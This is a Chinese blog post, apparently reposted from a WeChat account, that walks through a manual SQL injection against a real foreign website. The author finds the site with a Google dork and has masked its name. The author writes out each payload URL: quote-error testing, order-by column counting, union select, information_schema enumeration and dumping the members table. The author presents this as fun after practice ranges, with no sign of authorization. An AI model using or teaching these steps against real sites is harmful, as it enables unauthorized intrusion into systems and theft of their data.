inurl+:php?id,实操:SQL注入国外xx网站

原标题:实操:SQL注入国外xx网站

来自公众号:孑蝉

前言:

学了SQL注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?

何为sql注入?

SQL注入就是SQL+注入,不清楚可以百度。

寻找网站:

google黑语法:

谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。

为什么不用百度呢?

少,并且找的多数为国内。

①、试探

http://www.xxx.org/members.php?id=1

08e620370509a1bb35da1bfd0cd38d22.png

用单引号“'”的时候,是会报错的。

接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。

http://www.xxx.org/members.php?id=1 order by 5

786abedc74b7d613a2e9f36c1f7ae366.png

http://www.xxx.org/members.php?id=1 order by 4

a546ef00c89fb04f4dea64e99e865284.png

由以上可知,当前表的列为4。

知道了几列,接下来就能知道回显的是哪几列。

②、联合注入

http://www.xxx.org/members.php?id=1 and false union select 1,2,3,4

800084308e544393bbc4a8a3be3ca1cd.png

回显了2,4列。

http://www.xxx.org/members.php?id=1 and false union select 1,user,3,database

eb522741de807e2510f3571438928ac7.png

接下来查字典库,information_schema。

http://www.xxx.org/members.php?id=1 and false union select 1,user,3,(selecttable_name from information_schema.tables where table_schema=database limit0,1)

987e01ba8c20fa808dfa5a6b4c9c00e6.png

http://www.xxx.org/members.php?id=1 and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database andtable_name='members' limit 0,1)

d51320c7838a9a8bb486530335f73d1b.png

concat字段查一查,member表里面到底有点啥。

http://www.xxx.org/members.php?id=1 and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database andtable_name='members' limit 0,1)

5c7cac7a562f10c39673710010e3959d.png

???

b06510e972d0e47a46058df65820162e.png

...

这是个什么网站呢?

ecf72eec87bbb0ea1c2874da00773583.png

有点意思。。。还好查的都是网站允许显示的数据,不涉及敏感数据。

sqlmap就不上了(只能查出三个数据库,没权限)。

嗯。。。到此为止。

fc84c4c4c661145e636f4682ac4ddda9.png

●编号1026,输入编号直达本文返回搜狐,查看更多

责任编辑:

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值